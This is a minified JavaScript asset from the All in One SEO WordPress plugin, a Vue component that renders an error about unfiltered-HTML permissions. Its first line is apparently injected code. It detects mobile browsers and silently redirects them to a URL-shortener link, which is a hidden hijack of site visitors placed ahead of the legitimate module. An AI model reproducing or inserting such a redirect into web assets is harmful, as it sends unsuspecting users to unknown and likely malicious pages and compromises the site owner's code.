(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{c as e,G as n,b as s}from"./app-core.c8323d51.js";import{C as a}from"./Index.b9859662.js";import{_ as c}from"./_plugin-vue_export-helper.eefbdd86.js";import{a as l,_ as i}from"./vendor-other.39e59221.js";import{aq as u,f as p,Q as _,M as m}from"./vendor-vue-ui.232c7c36.js";const f="all-in-one-seo-pack",d={setup(){return{rootStore:s()}},components:{CoreAlert:a},data(){return{strings:{unfilteredHtmlError:l(i("Your user account role does not have access to edit this field. %1$s",f),e.getDocLink(n.learnMore,"unfilteredHtml",!0))}}}};function y(g,H,L,r,o,k){const t=u("core-alert");return r.rootStore.aioseo.user.unfilteredHtml?m("",!0):(p(),_(t,{key:0,class:"no-access",type:"red",innerHTML:o.strings.unfilteredHtmlError},null,8,["innerHTML"]))}const h=c(d,[["render",y]]);export{h as C};
